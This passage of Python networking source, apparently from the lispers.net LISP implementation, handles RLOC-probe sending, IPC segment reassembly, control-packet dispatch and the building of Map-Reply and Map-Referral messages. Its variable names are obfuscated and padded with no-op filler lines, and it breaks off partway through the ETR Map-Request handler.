    set_ttl = (LISP_RLOC_PROBE_TTL == 255)
    if (set_ttl):
        lisp_type = struct.unpack("B", packet[0])[0]
        set_ttl = (lisp_type in [0x12, 0x28])
        if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)

    try: lisp_socket.sendto(packet, (address, port))
    # Fix: was py2-only "except socket.error, e" (removed in py3).
    except socket.error as e:
        lprint("socket.sendto() failed: {}".format(e))

    # Restore the default TTL if we changed it for the probe.
    if (set_ttl): lisp_set_ttl(lisp_socket, 64)
    return
if 62 - 62: I1ii11iIi11i % i1IIi % I1Ii111 * ooOoO0o % OOooOOo + I1IiiI
if 100 - 100: II111iiii - o0oOOo0O0Ooo * OoooooooOO . ooOoO0o / II111iiii / oO0o
if 43 - 43: iIii1I11I1II1 + ooOoO0o * iII111i + iIii1I11I1II1 . I1Ii111
if 87 - 87: I1Ii111
if 47 - 47: II111iiii + I1IiiI . Oo0Ooo / iIii1I11I1II1
if 14 - 14: i1IIi / OoO0O00 / iII111i % I1Ii111
if 72 - 72: OoO0O00 . II111iiii - IiII + IiII + iIii1I11I1II1 % oO0o
if 21 - 21: iII111i + OoOoOO00 - i11iIiiIii % O0 + OOooOOo
def lisp_receive_segments ( lisp_socket , packet , source , total_length ) :
    # Reassemble a segmented IPC message. 'packet' holds the bytes
    # received so far; keep reading datagrams from 'lisp_socket' until
    # 'total_length' bytes have accumulated.
    #
    # Returns [True, packet] when the message is complete,
    # [False, None] on a socket error, or [False, <new-datagram>] when
    # a fresh "packet@..." message header arrives mid-reassembly (the
    # old partial message is discarded and the new one handed back to
    # the caller).
    if 30 - 30: o0oOOo0O0Ooo - Oo0Ooo + iII111i / O0
    if 94 - 94: IiII
    if 69 - 69: I1Ii111 . I1Ii111
    if 53 - 53: i11iIiiIii + iII111i * Oo0Ooo - I1Ii111
    if 61 - 61: o0oOOo0O0Ooo / OOooOOo . II111iiii - I1IiiI * i11iIiiIii
    # Bytes still outstanding; nothing to do if everything has arrived.
    o0O = total_length - len ( packet )
    if ( o0O == 0 ) : return ( [ True , packet ] )
    if 8 - 8: iII111i % o0oOOo0O0Ooo
    lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( packet ) ,
        total_length , source ) )
    if 87 - 87: Ii1I % I11i / I1Ii111
    if 21 - 21: OoO0O00 + Ii1I / I1Ii111
    if 75 - 75: I1Ii111 . Ii1I % iIii1I11I1II1 / OoOoOO00
    if 38 - 38: i1IIi
    if 1 - 1: I1ii11iIi11i + OoO0O00 % I11i . OOooOOo + i1IIi / oO0o
    iiiIIiiIi = o0O
    while ( iiiIIiiIi > 0 ) :
        # recvfrom() returns (data, address); any error aborts reassembly.
        try : OoO0oo = lisp_socket . recvfrom ( 9000 )
        except : return ( [ False , None ] )
        if 35 - 35: ooOoO0o % OoOoOO00 % OoO0O00 + OOooOOo / IiII * OoOoOO00
        OoO0oo = OoO0oo [ 0 ]
        if 65 - 65: I1IiiI . Oo0Ooo + i1IIi - Ii1I * i1IIi
        if 64 - 64: I1IiiI / OoO0O00 * I1IiiI * II111iiii . Ii1I
        if 98 - 98: I1Ii111 + o0oOOo0O0Ooo
        if 73 - 73: I1ii11iIi11i / I1Ii111 + i11iIiiIii + OoO0O00 . ooOoO0o
        if 54 - 54: I1ii11iIi11i + IiII - oO0o + Oo0Ooo / IiII % Oo0Ooo
        # A datagram starting with "packet@" is the header of a brand
        # new message, not a continuation segment: give up on this one.
        if ( OoO0oo . find ( "packet@" ) == 0 ) :
            I111I = OoO0oo . split ( "@" )
            lprint ( "Received new message ({}-out-of-{}) while receiving " + "fragments, old message discarded" , len ( OoO0oo ) ,
                # I11i / O0 - II111iiii % Oo0Ooo - OoOoOO00
                I111I [ 1 ] if len ( I111I ) > 2 else "?" )
            return ( [ False , OoO0oo ] )
        if 69 - 69: OOooOOo
        if 43 - 43: OOooOOo
        # Append the segment and account for the bytes received.
        iiiIIiiIi -= len ( OoO0oo )
        packet += OoO0oo
        if 27 - 27: OOooOOo * II111iiii
        lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( OoO0oo ) , total_length , source ) )
    if 16 - 16: i11iIiiIii + I1ii11iIi11i
    if 33 - 33: iIii1I11I1II1
    return ( [ True , packet ] )
if 72 - 72: I1ii11iIi11i * i11iIiiIii
if 12 - 12: O0 - iIii1I11I1II1 % Oo0Ooo / O0 - IiII
if 55 - 55: OOooOOo . Oo0Ooo * OoOoOO00 / OoooooooOO * i11iIiiIii + oO0o
if 45 - 45: Ii1I
if 8 - 8: oO0o + OOooOOo
if 37 - 37: IiII - OoOoOO00 + oO0o - Oo0Ooo + IiII
if 33 - 33: Oo0Ooo % oO0o - I1IiiI + Oo0Ooo
if 90 - 90: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1 % IiII * I1Ii111 . I1Ii111
def lisp_bit_stuff(payload):
    """
    Rejoin IPC payload pieces that were produced by splitting on "@":
    the payload body itself contained literal 0x40 ("@") bytes, so put
    them back between the pieces.
    """
    lprint("Bit-stuffing, found {} segments".format(len(payload)))
    return("\x40".join(payload))
if 90 - 90: o0oOOo0O0Ooo - O0 % O0 - oO0o . OoooooooOO
if 30 - 30: I11i + O0 / Ii1I / OoOoOO00 - oO0o + II111iiii
if 21 - 21: iIii1I11I1II1 % OoooooooOO * OOooOOo % i1IIi
if 73 - 73: OoooooooOO
if 100 - 100: I11i / i1IIi / i1IIi % Ii1I - II111iiii . OoooooooOO
if 72 - 72: Oo0Ooo * OoooooooOO % I1IiiI + I11i - II111iiii
if 82 - 82: iIii1I11I1II1 / i1IIi * I1IiiI . i11iIiiIii
if 56 - 56: Ii1I * I1IiiI / ooOoO0o * II111iiii
if 51 - 51: i1IIi . oO0o % OOooOOo
if 90 - 90: OoooooooOO + iII111i / iIii1I11I1II1
if 12 - 12: OoooooooOO
if 9 - 9: O0 / O0 / I1IiiI - oO0o . ooOoO0o
if 6 - 6: O0 - OoO0O00 + OoooooooOO % iIii1I11I1II1
if 58 - 58: i11iIiiIii * OOooOOo . Oo0Ooo / iII111i - i1IIi
if 45 - 45: Ii1I
if 89 - 89: ooOoO0o + I11i * O0 % OoOoOO00
if 2 - 2: I1Ii111 % iIii1I11I1II1 . Ii1I - II111iiii
if 33 - 33: I11i . i11iIiiIii % i1IIi * II111iiii * i11iIiiIii + OoOoOO00
if 26 - 26: I1IiiI % OoOoOO00 % I11i + Oo0Ooo
if 86 - 86: iII111i / i1IIi % Oo0Ooo
def lisp_receive ( lisp_socket , internal ) :
    # Receive the next message from 'lisp_socket'.
    #
    # internal == False: the socket carries raw LISP control/data
    # packets from the network; returns ["packet", source, port, data].
    #
    # internal == True: the socket carries lispers.net IPC messages of
    # the form "<opcode>@<length>@<source>@<port>@@<data>", possibly
    # segmented across datagrams; reassembles and returns
    # [opcode, source, port, data].
    #
    # On a socket error returns ["", "", "", ""].
    while ( True ) :
        if 84 - 84: o0oOOo0O0Ooo * OOooOOo . I11i * Ii1I
        if 32 - 32: ooOoO0o % ooOoO0o * I1ii11iIi11i % Ii1I + Oo0Ooo . OoOoOO00
        if 2 - 2: I1Ii111 / ooOoO0o * oO0o + IiII
        if 14 - 14: OoOoOO00 / iIii1I11I1II1 . o0oOOo0O0Ooo % i11iIiiIii . OoOoOO00
        # recvfrom() returns (data, (address, port)).
        try : oOii1I = lisp_socket . recvfrom ( 9000 )
        except : return ( [ "" , "" , "" , "" ] )
        if 54 - 54: OOooOOo / I1ii11iIi11i % oO0o
        if 66 - 66: I11i + iII111i
        if 50 - 50: IiII
        if 33 - 33: OOooOOo % I1IiiI - I1IiiI / IiII
        if 22 - 22: ooOoO0o * ooOoO0o % o0oOOo0O0Ooo * Ii1I . OoO0O00
        if 55 - 55: OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1 - i11iIiiIii / i1IIi / II111iiii
        # External socket: hand back the raw packet after optional logging.
        if ( internal == False ) :
            IIii1i = oOii1I [ 0 ]
            oo00Oo0 = lisp_convert_6to4 ( oOii1I [ 1 ] [ 0 ] )
            IiI1iI1 = oOii1I [ 1 ] [ 1 ]
            if 37 - 37: Ii1I + o0oOOo0O0Ooo
            # Data-plane packets are logged only when data-plane logging
            # is enabled, and only the first 60 bytes are formatted.
            if ( IiI1iI1 == LISP_DATA_PORT ) :
                OOOoo = lisp_data_plane_logging
                iiIIiI = lisp_format_packet ( IIii1i [ 0 : 60 ] ) + " ..."
            else :
                OOOoo = True
                iiIIiI = lisp_format_packet ( IIii1i )
            if 31 - 31: Ii1I . O0 / o0oOOo0O0Ooo + I11i
            if 72 - 72: O0 * iIii1I11I1II1 - I1Ii111 / IiII * O0
            if ( OOOoo ) :
                lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Receive" ,
                    False ) , len ( IIii1i ) , bold ( "from " + oo00Oo0 , False ) , IiI1iI1 ,
                    iiIIiI ) )
            if 52 - 52: I11i
            return ( [ "packet" , oo00Oo0 , IiI1iI1 , IIii1i ] )
        if 3 - 3: oO0o + Oo0Ooo
        if 36 - 36: o0oOOo0O0Ooo % i1IIi
        if 51 - 51: Ii1I * iII111i
        if 24 - 24: iII111i * IiII / OOooOOo
        if 64 - 64: iII111i * Oo0Ooo
        if 42 - 42: ooOoO0o . O0 * ooOoO0o
        # Internal IPC socket: parse the header and reassemble segments.
        oooO0Oo = False
        oo00000ooOooO = oOii1I [ 0 ]
        i1I1i1iI1iI1 = False
        if 64 - 64: Ii1I
        while ( oooO0Oo == False ) :
            oo00000ooOooO = oo00000ooOooO . split ( "@" )
            if 20 - 20: I11i
            # A well-formed header has at least opcode, length, source,
            # and port fields; anything shorter is a stray fragment.
            if ( len ( oo00000ooOooO ) < 4 ) :
                lprint ( "Possible fragment (length {}), from old message, " + "discarding" , len ( oo00000ooOooO [ 0 ] ) )
                if 58 - 58: Oo0Ooo * O0 - OoO0O00
                i1I1i1iI1iI1 = True
                break
            if 70 - 70: Ii1I * i11iIiiIii
            if 28 - 28: II111iiii / ooOoO0o * i11iIiiIii % OOooOOo
            i1I1i1II = oo00000ooOooO [ 0 ]
            try :
                Iiii111 = int ( oo00000ooOooO [ 1 ] )
            except :
                oOoooO0 = bold ( "Internal packet reassembly error" , False )
                lprint ( "{}: {}" . format ( oOoooO0 , oOii1I ) )
                i1I1i1iI1iI1 = True
                break
            if 89 - 89: O0 % i1IIi * I1ii11iIi11i / OOooOOo % OoooooooOO / I1IiiI
            oo00Oo0 = oo00000ooOooO [ 2 ]
            IiI1iI1 = oo00000ooOooO [ 3 ]
            if 12 - 12: i1IIi / II111iiii . I11i
            if 61 - 61: OOooOOo % O0 . I1ii11iIi11i . iIii1I11I1II1 * I11i
            if 29 - 29: ooOoO0o + i1IIi % IiII * Ii1I
            if 94 - 94: OOooOOo / IiII
            if 18 - 18: IiII - I11i / Ii1I % IiII * i1IIi
            if 22 - 22: OoOoOO00 - Oo0Ooo
            if 41 - 41: iIii1I11I1II1 * I1Ii111 / OoO0O00
            if 33 - 33: I11i + O0
            # More than 5 fields means the payload itself contained "@"
            # bytes; rejoin the extra pieces via lisp_bit_stuff().
            if ( len ( oo00000ooOooO ) > 5 ) :
                IIii1i = lisp_bit_stuff ( oo00000ooOooO [ 4 : : ] )
            else :
                IIii1i = oo00000ooOooO [ 4 ]
            if 9 - 9: I11i . iII111i * ooOoO0o * ooOoO0o
            if 68 - 68: O0 - i11iIiiIii % iIii1I11I1II1 % ooOoO0o
            if 12 - 12: II111iiii + I11i
            if 9 - 9: I1ii11iIi11i
            if 51 - 51: I1ii11iIi11i
            if 37 - 37: I1IiiI % I1Ii111
            # Pull in any remaining segments of this message.
            oooO0Oo , IIii1i = lisp_receive_segments ( lisp_socket , IIii1i ,
                oo00Oo0 , Iiii111 )
            if ( IIii1i == None ) : return ( [ "" , "" , "" , "" ] )
            if 22 - 22: o0oOOo0O0Ooo % OOooOOo - I11i + ooOoO0o / OOooOOo
            if 98 - 98: I11i * O0 + IiII - oO0o
            if 35 - 35: OoooooooOO * Ii1I
            if 73 - 73: ooOoO0o . OoO0O00 % I1ii11iIi11i - oO0o
            if 67 - 67: o0oOOo0O0Ooo . I11i + i1IIi
            # A new message header interrupted reassembly: reparse it.
            if ( oooO0Oo == False ) :
                oo00000ooOooO = IIii1i
                continue
            if 100 - 100: Oo0Ooo - I1IiiI . OOooOOo % iIii1I11I1II1 . I11i
            if 83 - 83: OoOoOO00 * iII111i
            if ( IiI1iI1 == "" ) : IiI1iI1 = "no-port"
            # For logging, show only the command name (text before " {")
            # unless this process is the core process.
            if ( i1I1i1II == "command" and lisp_i_am_core == False ) :
                ooo = IIii1i . find ( " {" )
                Oo = IIii1i if ooo == - 1 else IIii1i [ : ooo ]
                Oo = ": '" + Oo + "'"
            else :
                Oo = ""
            if 25 - 25: oO0o . OoO0O00 % Ii1I % Ii1I
            if 94 - 94: iII111i . Ii1I
            lprint ( "{} {} bytes {} {}, {}{}" . format ( bold ( "Receive" , False ) ,
                len ( IIii1i ) , bold ( "from " + oo00Oo0 , False ) , IiI1iI1 , i1I1i1II ,
                Oo if ( i1I1i1II in [ "command" , "api" ] ) else ": ... " if ( i1I1i1II == "data-packet" ) else ": " + lisp_format_packet ( IIii1i ) ) )
        if 71 - 71: o0oOOo0O0Ooo * II111iiii / OOooOOo . OoO0O00
        if 73 - 73: I1Ii111 * OoO0O00 / OoOoOO00 . II111iiii
        if 87 - 87: OoO0O00 + Oo0Ooo + O0 % OoooooooOO - iIii1I11I1II1
        if 100 - 100: Oo0Ooo + IiII
        if 81 - 81: iIii1I11I1II1 + iIii1I11I1II1
        # A malformed message was dropped: go back to receiving.
        if ( i1I1i1iI1iI1 ) : continue
        return ( [ i1I1i1II , oo00Oo0 , IiI1iI1 , IIii1i ] )
if 19 - 19: ooOoO0o + i1IIi / Oo0Ooo * II111iiii * I1Ii111 / ooOoO0o
if 23 - 23: I1Ii111
if 76 - 76: Ii1I + Ii1I / i1IIi % o0oOOo0O0Ooo . iIii1I11I1II1 . OoOoOO00
if 75 - 75: I11i . Ii1I / I1ii11iIi11i
if 99 - 99: Ii1I
if 85 - 85: I1Ii111 + I1Ii111 + OoOoOO00 / ooOoO0o / o0oOOo0O0Ooo . Oo0Ooo
if 41 - 41: i1IIi % Ii1I . i1IIi * OoooooooOO % Ii1I
if 21 - 21: iII111i
def lisp_parse_packet ( lisp_sockets , packet , source , udp_sport , ttl = - 1 ) :
    # Demultiplex a received LISP control packet on its header type and
    # dispatch to the matching processing routine.
    #
    # The return value is initialized False and only updated by the
    # Info-Reply branch (third return value of lisp_process_info_reply);
    # all other branches return False.
    O0oOOoo0o0 = False
    if 2 - 2: Ii1I / OOooOOo
    Ii1I1i1IiiI = lisp_control_header ( )
    if ( Ii1I1i1IiiI . decode ( packet ) == None ) :
        lprint ( "Could not decode control header" )
        return ( O0oOOoo0o0 )
    if 64 - 64: i1IIi % Oo0Ooo / O0 % Oo0Ooo
    if 49 - 49: II111iiii * iIii1I11I1II1 / I11i - oO0o
    if 76 - 76: I1Ii111 . Oo0Ooo - ooOoO0o . II111iiii - iII111i
    if 36 - 36: iIii1I11I1II1 % Oo0Ooo
    if 67 - 67: oO0o / II111iiii . I11i / oO0o
    # 'source' may be a process name ("lisp-...") or an address string;
    # convert address strings into a lisp_address object. The original
    # string is kept for the Map-Notify process check below.
    IIIIi1i1i1iII = source
    if ( source . find ( "lisp" ) == - 1 ) :
        IiII1iiI = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
        IiII1iiI . string_to_afi ( source )
        IiII1iiI . store_address ( source )
        source = IiII1iiI
    if 61 - 61: o0oOOo0O0Ooo % i1IIi / i11iIiiIii % I1ii11iIi11i . I1ii11iIi11i + OOooOOo
    if 97 - 97: OOooOOo % iIii1I11I1II1 % OoO0O00 . I11i * o0oOOo0O0Ooo
    if ( Ii1I1i1IiiI . type == LISP_MAP_REQUEST ) :
        lisp_process_map_request ( lisp_sockets , packet , None , 0 , source ,
            udp_sport , False , ttl )
        if 64 - 64: OoOoOO00 + OoOoOO00 * IiII + I1ii11iIi11i % o0oOOo0O0Ooo
    elif ( Ii1I1i1IiiI . type == LISP_MAP_REPLY ) :
        lisp_process_map_reply ( lisp_sockets , packet , source , ttl )
        if 25 - 25: oO0o + i11iIiiIii * OoooooooOO - iIii1I11I1II1
    elif ( Ii1I1i1IiiI . type == LISP_MAP_REGISTER ) :
        lisp_process_map_register ( lisp_sockets , packet , source , udp_sport )
        if 47 - 47: Oo0Ooo . Ii1I
    elif ( Ii1I1i1IiiI . type == LISP_MAP_NOTIFY ) :
        # Multicast Map-Notify handling depends on which process we are.
        if ( IIIIi1i1i1iII == "lisp-etr" ) :
            lisp_process_multicast_map_notify ( packet , source )
        else :
            if ( lisp_is_running ( "lisp-rtr" ) ) :
                lisp_process_multicast_map_notify ( packet , source )
            if 25 - 25: I1ii11iIi11i / i1IIi * oO0o - II111iiii * i1IIi
            lisp_process_map_notify ( lisp_sockets , packet , source )
        if 57 - 57: OoO0O00 % OoO0O00
        if 67 - 67: O0 . i11iIiiIii + iIii1I11I1II1
    elif ( Ii1I1i1IiiI . type == LISP_MAP_NOTIFY_ACK ) :
        lisp_process_map_notify_ack ( packet , source )
        if 86 - 86: iIii1I11I1II1
    elif ( Ii1I1i1IiiI . type == LISP_MAP_REFERRAL ) :
        lisp_process_map_referral ( lisp_sockets , packet , source )
        if 81 - 81: OOooOOo / I11i / OoooooooOO
    elif ( Ii1I1i1IiiI . type == LISP_NAT_INFO and Ii1I1i1IiiI . is_info_reply ( ) ) :
        O0o000 , o00oo0 , O0oOOoo0o0 = lisp_process_info_reply ( source , packet , True )
        if 74 - 74: I11i + OoooooooOO % II111iiii % o0oOOo0O0Ooo
    elif ( Ii1I1i1IiiI . type == LISP_NAT_INFO and Ii1I1i1IiiI . is_info_reply ( ) == False ) :
        oo0o00OO = source . print_address_no_iid ( )
        lisp_process_info_request ( lisp_sockets , packet , oo0o00OO , udp_sport ,
            None )
        if 27 - 27: OoO0O00 * Oo0Ooo
    elif ( Ii1I1i1IiiI . type == LISP_ECM ) :
        lisp_process_ecm ( lisp_sockets , packet , source , udp_sport )
        if 80 - 80: i11iIiiIii . OoO0O00 - I11i % I11i
    else :
        lprint ( "Invalid LISP control packet type {}" . format ( Ii1I1i1IiiI . type ) )
    if 21 - 21: I1IiiI . OoO0O00 * IiII % OoooooooOO - Oo0Ooo + Oo0Ooo
    return ( O0oOOoo0o0 )
if 94 - 94: ooOoO0o
if 80 - 80: i11iIiiIii - O0 / I1Ii111 + OOooOOo % Oo0Ooo
if 95 - 95: II111iiii
if 76 - 76: OoO0O00 % iII111i * OoOoOO00 / ooOoO0o / i1IIi
if 45 - 45: Ii1I . I11i * I1Ii111 . i11iIiiIii
if 34 - 34: O0 * o0oOOo0O0Ooo / IiII
if 75 - 75: I1Ii111 - i1IIi - OoO0O00
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
    ttl):
    """
    Hand a received RLOC-probe Map-Request to the ETR or RTR Map-Request
    code so an RLOC-probe Map-Reply is sent; log and ignore it when this
    process is neither an ETR nor an RTR.
    """
    probe = bold("RLOC-probe", False)

    if (lisp_i_am_etr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(probe))
        lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
            ttl)
    elif (lisp_i_am_rtr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(probe))
        lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
            ttl)
    else:
        lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(probe))
    return
if 30 - 30: OoO0O00 / OoOoOO00 + I1ii11iIi11i % IiII - OoO0O00
if 19 - 19: I1IiiI
if 99 - 99: OOooOOo - OOooOOo
if 98 - 98: o0oOOo0O0Ooo + O0 * oO0o - i11iIiiIii
if 83 - 83: o0oOOo0O0Ooo
def lisp_process_smr(map_request):
    """Log receipt of an SMR-based Map-Request; no further processing here."""
    lprint("Received SMR-based Map-Request")
if 23 - 23: o0oOOo0O0Ooo . I11i
if 67 - 67: iII111i
if 52 - 52: IiII . OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / IiII . OoooooooOO . Oo0Ooo / ooOoO0o + O0
if 38 - 38: I11i
def lisp_process_smr_invoked_request(map_request):
    """Log receipt of an SMR-invoked Map-Request; no further processing here."""
    lprint("Received SMR-invoked Map-Request")
if 66 - 66: II111iiii
if 57 - 57: OoO0O00 / Oo0Ooo % I1IiiI * I1ii11iIi11i
if 68 - 68: iII111i - o0oOOo0O0Ooo - OoO0O00 . O0 - i11iIiiIii
if 2 - 2: I1ii11iIi11i * i1IIi
if 17 - 17: I1ii11iIi11i * Ii1I % Oo0Ooo * I1Ii111 + OoO0O00 . OoooooooOO
if 60 - 60: Ii1I . II111iiii
if 36 - 36: IiII . iII111i * O0 . i1IIi * O0 * I1Ii111
def lisp_build_map_reply ( eid , group , rloc_set , nonce , action , ttl , rloc_probe ,
    keys , enc , auth , mr_ttl = - 1 ) :
    # Build and return an encoded Map-Reply message carrying a single
    # EID record for (eid, group) with one RLOC record per entry of
    # 'rloc_set'. 'mr_ttl' (when not -1) becomes the message hop-count;
    # 'enc' sets the echo-nonce-capable bit; 'auth' the authoritative
    # bit; 'rloc_probe' marks this as an RLOC-probe reply.
    IiIIIi = lisp_map_reply ( )
    IiIIIi . rloc_probe = rloc_probe
    IiIIIi . echo_nonce_capable = enc
    IiIIIi . hop_count = 0 if ( mr_ttl == - 1 ) else mr_ttl
    IiIIIi . record_count = 1
    IiIIIi . nonce = nonce
    IIii1i = IiIIIi . encode ( )
    IiIIIi . print_map_reply ( )
    if 70 - 70: I1Ii111 * I11i % oO0o % ooOoO0o * iII111i - I1Ii111
    iiI = lisp_eid_record ( )
    iiI . rloc_count = len ( rloc_set )
    iiI . authoritative = auth
    iiI . record_ttl = ttl
    iiI . action = action
    iiI . eid = eid
    iiI . group = group
    if 5 - 5: IiII - iIii1I11I1II1 % oO0o % i1IIi
    IIii1i += iiI . encode ( )
    iiI . print_record ( " " , False )
    if 68 - 68: OoooooooOO * Oo0Ooo / o0oOOo0O0Ooo * I11i + OoO0O00 . OoooooooOO
    # Addresses owned by this system (including NAT-translated ones);
    # used to set the local bit on matching RLOC records.
    iII111111 = lisp_get_all_addresses ( ) + lisp_get_all_translated_rlocs ( )
    if 71 - 71: OoO0O00 - ooOoO0o - I1IiiI + O0
    for iIII in rloc_set :
        iIii1IiIiI = lisp_rloc_record ( )
        oo0o00OO = iIII . rloc . print_address_no_iid ( )
        # Only locally-owned RLOCs carry the probe bit and security keys;
        # priority 254 on an RTR is advertised with the name "RTR".
        if ( oo0o00OO in iII111111 ) :
            iIii1IiIiI . local_bit = True
            iIii1IiIiI . probe_bit = rloc_probe
            iIii1IiIiI . keys = keys
            if ( iIII . priority == 254 and lisp_i_am_rtr ) :
                iIii1IiIiI . rloc_name = "RTR"
        if 91 - 91: I1ii11iIi11i % i1IIi
        if 43 - 43: IiII / i11iIiiIii
        iIii1IiIiI . store_rloc_entry ( iIII )
        iIii1IiIiI . reach_bit = True
        iIii1IiIiI . print_record ( " " )
        IIii1i += iIii1IiIiI . encode ( )
    if 41 - 41: I11i % I1Ii111 % iII111i . OOooOOo
    return ( IIii1i )
if 46 - 46: I1ii11iIi11i + oO0o % I1Ii111
if 35 - 35: iIii1I11I1II1 + O0 * oO0o . i11iIiiIii
if 63 - 63: OOooOOo * OoooooooOO * iII111i
if 68 - 68: OoO0O00 / O0 + I1IiiI - i11iIiiIii
if 40 - 40: iIii1I11I1II1 / OoO0O00 * II111iiii + IiII % I1Ii111 / iIii1I11I1II1
if 79 - 79: iII111i . O0 * Oo0Ooo % o0oOOo0O0Ooo % OoO0O00
if 77 - 77: II111iiii - I1Ii111
def lisp_build_map_referral ( eid , group , ddt_entry , action , ttl , nonce ) :
    # Build and return an encoded DDT Map-Referral message with one EID
    # record describing 'ddt_entry' (or the bare eid/group when no
    # delegation entry exists), followed by one RLOC record per
    # delegation-set member.
    O0OOoOoOO = lisp_map_referral ( )
    O0OOoOoOO . record_count = 1
    O0OOoOoOO . nonce = nonce
    IIii1i = O0OOoOoOO . encode ( )
    O0OOoOoOO . print_map_referral ( )
    if 69 - 69: O0
    iiI = lisp_eid_record ( )
    if 37 - 37: i1IIi * iIii1I11I1II1 % OoooooooOO . OoooooooOO / Oo0Ooo % i11iIiiIii
    # Number of delegation (RLOC) records to emit.
    OOO0Oo0o = 0
    if ( ddt_entry == None ) :
        iiI . eid = eid
        iiI . group = group
    else :
        OOO0Oo0o = len ( ddt_entry . delegation_set )
        iiI . eid = ddt_entry . eid
        iiI . group = ddt_entry . group
        ddt_entry . map_referrals_sent += 1
    if 78 - 78: Oo0Ooo
    iiI . rloc_count = OOO0Oo0o
    iiI . authoritative = True
    if 74 - 74: O0 / I11i
    if 52 - 52: I1IiiI + oO0o * II111iiii
    if 15 - 15: I11i
    if 72 - 72: O0
    if 15 - 15: II111iiii / I11i % II111iiii % Ii1I % i11iIiiIii / I1Ii111
    # Refine a NULL action from the first delegation entry: the child
    # type selects node-referral versus ms-referral.
    IiiIIiIi1i11i = False
    if ( action == LISP_DDT_ACTION_NULL ) :
        if ( OOO0Oo0o == 0 ) :
            action = LISP_DDT_ACTION_NODE_REFERRAL
        else :
            ii1iII11 = ddt_entry . delegation_set [ 0 ]
            if ( ii1iII11 . is_ddt_child ( ) ) :
                action = LISP_DDT_ACTION_NODE_REFERRAL
            if 93 - 93: OOooOOo / OoooooooOO % iII111i
            if ( ii1iII11 . is_ms_child ( ) ) :
                action = LISP_DDT_ACTION_MS_REFERRAL
    if 47 - 47: o0oOOo0O0Ooo - I1IiiI % O0 % I1Ii111 . O0 . OoOoOO00
    if 95 - 95: o0oOOo0O0Ooo * OOooOOo - iII111i * OoooooooOO - ooOoO0o / I1IiiI
    if 47 - 47: OoO0O00 % I1IiiI / OoOoOO00 - I1Ii111 / I1IiiI
    if 13 - 13: o0oOOo0O0Ooo % ooOoO0o
    if 15 - 15: iII111i * I1IiiI . iIii1I11I1II1 % I1IiiI / O0
    if 47 - 47: OoooooooOO - i11iIiiIii . I1IiiI / i1IIi
    if 74 - 74: OoooooooOO * ooOoO0o
    # NOTE(review): 'ii1iII11' is bound only when the NULL-action branch
    # above ran with a non-empty delegation set; an MS_REFERRAL/MS_ACK
    # action passed in directly appears to rely on that — confirm.
    if ( action == LISP_DDT_ACTION_NOT_AUTH ) : IiiIIiIi1i11i = True
    if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
        IiiIIiIi1i11i = ( lisp_i_am_ms and ii1iII11 . is_ms_peer ( ) == False )
    if 45 - 45: Oo0Ooo + iIii1I11I1II1 . o0oOOo0O0Ooo
    if 50 - 50: o0oOOo0O0Ooo % O0
    iiI . action = action
    iiI . ddt_incomplete = IiiIIiIi1i11i
    iiI . record_ttl = ttl
    if 67 - 67: OoOoOO00
    IIii1i += iiI . encode ( )
    iiI . print_record ( " " , True )
    if 21 - 21: I11i % Oo0Ooo + Oo0Ooo / iIii1I11I1II1 % iIii1I11I1II1
    if ( OOO0Oo0o == 0 ) : return ( IIii1i )
    if 66 - 66: iII111i
    # One RLOC record per delegation-set entry.
    for ii1iII11 in ddt_entry . delegation_set :
        iIii1IiIiI = lisp_rloc_record ( )
        iIii1IiIiI . rloc = ii1iII11 . delegate_address
        iIii1IiIiI . priority = ii1iII11 . priority
        iIii1IiIiI . weight = ii1iII11 . weight
        iIii1IiIiI . mpriority = 255
        iIii1IiIiI . mweight = 0
        iIii1IiIiI . reach_bit = True
        IIii1i += iIii1IiIiI . encode ( )
        iIii1IiIiI . print_record ( " " )
    if 72 - 72: ooOoO0o / oO0o / iII111i . I1Ii111 . I1ii11iIi11i + IiII
    return ( IIii1i )
if 39 - 39: I1IiiI % I1Ii111
if 22 - 22: OoOoOO00 - OOooOOo % i1IIi + i1IIi
if 28 - 28: oO0o + OoOoOO00 * Ii1I . I11i
if 80 - 80: I1ii11iIi11i / OoOoOO00
if 74 - 74: I1ii11iIi11i + O0 + o0oOOo0O0Ooo - iII111i
if 48 - 48: ooOoO0o * iIii1I11I1II1 % Oo0Ooo
if 60 - 60: OoOoOO00 / i1IIi * iIii1I11I1II1
def lisp_etr_process_map_request(lisp_sockets, map_request, source, sport,
    ttl):
    """
    ETR processing of a (typically RLOC-probe) Map-Request: look up the
    requested EID (or group for multicast) in our database mappings and
    send back a Map-Reply. When NAT traversal is active and the probe
    came through an RTR (or sport is 0), the reply is encapsulated as an
    RLOC-probe instead of being sent natively.
    """

    # Unicast requests key on target_eid; multicast on (group, source-EID).
    if (map_request.target_group.is_null()):
        db = lisp_db_for_lookups.lookup_cache(map_request.target_eid, False)
    else:
        db = lisp_db_for_lookups.lookup_cache(map_request.target_group, False)
        if (db): db = db.lookup_source_cache(map_request.target_eid, False)

    eid_str = map_request.print_prefix()

    if (db == None):
        lprint("Database-mapping entry not found for requested EID {}".format(green(eid_str, False)))
        return

    db_eid_str = db.print_eid_tuple()

    lprint("Found database-mapping EID-prefix {} for requested EID {}".format(green(db_eid_str, False), green(eid_str, False)))

    # Reply to the first ITR-RLOC; a private one behind NAT means we
    # must answer the outer source address instead.
    itr_rloc = map_request.itr_rlocs[0]
    if (itr_rloc.is_private_address() and lisp_nat_traversal):
        itr_rloc = source

    nonce = map_request.nonce
    enc = lisp_nonce_echoing
    keys = map_request.keys

    db.map_replies_sent += 1

    packet = lisp_build_map_reply(db.eid, db.group, db.rloc_set, nonce,
        LISP_NO_ACTION, 1440, map_request.rloc_probe, keys, enc, True, ttl)

    # An RLOC-probe from a known RTR (public address) or with sport 0
